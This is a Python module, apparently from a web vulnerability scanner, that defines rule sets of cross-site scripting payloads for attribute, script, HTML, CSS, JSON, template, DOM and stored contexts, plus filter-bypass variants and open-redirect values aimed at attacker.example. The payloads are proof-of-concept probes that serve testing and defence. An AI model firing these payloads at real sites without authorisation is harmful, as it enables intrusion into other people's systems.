"""
전부 완전교체 payload({value} 없음) — 마크업/스크립트 조각을 파라미터 값 전체로 치환한다.
"""

from __future__ import annotations

XSS_RULES: list[dict] = [
    {
        "attack_id": "PL-XSS-ATTR-VALUE",
        "vuln_type": "xss",
        "technique": "attr_value",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                '"><img src=x onerror=alert(1)>',
                '"><svg onload=alert(1)>',
                '" onmouseover=alert(1) x="',
                '" autofocus onfocus=alert(1) x="',
                '" oninput=alert(1) x="',
                '" onclick=alert(1) x="',
                '"><img src=x onerror=alert`1`>',
                '"><details open ontoggle=alert(1)>',
                '"><body onpageshow=alert(1)>',
                '"><input autofocus onfocus=alert(1)>',
                '"><marquee onstart=alert(1)>xss</marquee>',
                '"><video src=x onerror=alert(1)>',
                '"><audio src=x onerror=alert(1)>',
                '"><iframe srcdoc="<script>alert(1)</script>">',
                '"><object data="javascript:alert(1)">',
                "'><img src=x onerror=alert(1)>",
                "'><svg onload=alert(1)>",
                "' onmouseover=alert(1) x='",
                "' autofocus onfocus=alert(1) x='",
                '";alert(1);//',
                "';alert(1);//",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-ATTR-HREF",
        "vuln_type": "xss",
        "technique": "attr_href",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "javascript:alert(1)",
                "JavaScript:alert(1)",
                "j&#97;vascript:alert(1)",
                "java\tscript:alert(1)",
                "java\nscript:alert(1)",
                "data:text/html,<script>alert(1)</script>",
                "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
                "vbscript:alert(1)",
                '" onmouseover=alert(1) href="#',
                '" onfocus=alert(1) href="#',
            ],
        },
    },
    {
        "attack_id": "PL-XSS-ATTR-EVENT",
        "vuln_type": "xss",
        "technique": "attr_event",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                '";alert(1);//',
                "';alert(1);//",
                '";alert(1);x="',
                '`-alert(1)-`',
                "';alert`1`;//",
                '"><img src=x onerror=alert(1)>',
            ],
        },
    },
    {
        "attack_id": "PL-XSS-SCRIPT",
        "vuln_type": "xss",
        "technique": "script",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                '";alert(1);//',
                "';alert(1);//",
                '";alert(document.domain);//',
                "';alert(document.domain);//",
                "`-alert(1)-`",
                "</script><script>alert(1)</script>",
                "</script><img src=x onerror=alert(1)>",
                "'+alert(1)+'",
                "',alert(1),'",
                "';throw/**/onerror=alert,1;//",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-SCRIPT-RAW",
        "vuln_type": "xss",
        "technique": "script_raw",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "alert(1)",
                "eval('\\x61lert\\x281\\x29')",
                "Function('ale'+'rt(1)')()",
                "setTimeout(alert,0,1)",
                "alert`1`",
                "location='javascript:alert(1)'",
                "document.write('<script>alert(1)<\\/script>')",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-HTML-COMMENT",
        "vuln_type": "xss",
        "technique": "html_comment",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "--><img src=x onerror=alert(1)><!--",
                "--><svg onload=alert(1)><!--",
                "--><script>alert(1)</script><!--",
                "--><![if]><img src=x onerror=alert(1)><!-->",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-BODY",
        "vuln_type": "xss",
        "technique": "body",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "<scrIpt>alert(1);</scRipt>",
                "<img src=x onerror=alert(1)>",
                "<img src=x onerror=prompt()>",
                "<svg onload=alert(1)>",
                "<img src=x onerror=alert`1`>",
                '<img src="javascript:alert(1)">',
                "<svg/onload=alert(1)>",
                "<svg><animate onbegin=alert(1) attributeName=x></animate></svg>",
                "<b onMouseOver=alert(1);>test</b>",
                "<script>alert(1)</script>",
                "<script src=data:,alert(1)></script>",
                "<body onload=alert(1)>",
                "<input autofocus onfocus=alert(1)>",
                "<details open ontoggle=alert(1)>",
                "<video src=x onerror=alert(1)>",
                "<audio src=x onerror=alert(1)>",
                '<iframe src="javascript:alert(1)">',
                '<iframe srcdoc="<script>alert(1)</script>">',
                "<form action=javascript:alert(1)><input type=submit>",
                '<math><annotation encoding="text/html"><script>alert(1)</script></annotation></math>',
                '<object data="javascript:alert(1)">',
                "<marquee onstart=alert(1)>xss</marquee>",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-CSS",
        "vuln_type": "xss",
        "technique": "css",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                '<style>*{x:expression(alert(1))}</style>',
                "@import 'javascript:alert(1)';",
                "background:url(javascript:alert(1))",
                '}</style><img src=x onerror=alert(1)>',
                '};alert(1);//',
            ],
        },
    },
    {
        "attack_id": "PL-XSS-JSON",
        "vuln_type": "xss",
        "technique": "json",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                '","<script>alert(1)</script>":"',
                "</script><script>alert(1)</script>",
                r'<script>alert(1)</script>',
                "&lt;script&gt;alert(1)&lt;/script&gt;",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-TEMPLATE",
        "vuln_type": "xss",
        "technique": "template",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "{{constructor.constructor('alert(1)')()}}",
                "{{7*7}}",
                "{{_c.constructor('alert(1)')()}}",
                "{{{<script>alert(1)</script>}}}",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-FILTER-BYPASS",
        "vuln_type": "xss",
        "technique": "filter_bypass",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "\0<scrIpt>alert(1);</scRipt>",
                "<ImG sRc=x OnErRoR=alert(1)>",
                "<ScRiPt>alert(1)</ScRiPt>",
                "<img\tsrc=x\tonerror=alert(1)>",
                "<img\nsrc=x\nonerror=alert(1)>",
                "<img/src=x/onerror=alert(1)>",
                "%253Cscript%253Ealert(1)%253C/script%253E",
                "%3Cscript%3Ealert(1)%3C/script%3E",
                "<img src=x onerror&#61;alert(1)>",
                "<img src=x onerror=alert`1`>",
                "<img src=x o/**/nerror=alert(1)>",
                '<svg><script>alert&lpar;1&rpar;</script></svg>',
                "<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>",
                "<script>eval(atob('YWxlcnQoMSk='))</script>",
                '<p onpointerover=alert(1)>hover me</p>',
                "<img src=x onerror=alert(1) >",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-STORED",
        "vuln_type": "xss",
        "technique": "stored",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "<script>alert(document.domain)</script>",
                "<img src=x onerror=alert(document.domain)>",
                "<svg onload=alert(document.domain)>",
                "<img/onerror=alert(1) src=x>",
                "<svg/onload=alert(1)>",
                "<iframe src=javascript:alert(document.cookie)>",
                "[xss](javascript:alert(1))",
                '"><img src=x onerror=alert(1) x="',
                "<input autofocus onfocus=alert(1)>",
                "<details open ontoggle=alert(document.domain)>",
                "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-OPEN-REDIRECT",
        "vuln_type": "open_redirect",
        "technique": "open_redirect",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "https://attacker.example/",
                "//attacker.example/",
                "javascript:alert(1)",
                "data:text/html,<script>alert(1)</script>",
                "\\\\attacker.example",
                "///attacker.example/",
            ],
        },
    },
    {
        "attack_id": "PL-XSS-DOM",
        "vuln_type": "xss",
        "technique": "dom",
        "sequence": ["baseline", "attack"],
        "payload_templates": {
            "attack": [
                "#<img src=x onerror=alert(1)>",
                "#<svg onload=alert(1)>",
                "<img src=x onerror=alert(1)>",
                "'-alert(1)-'",
            ],
        },
    },
]
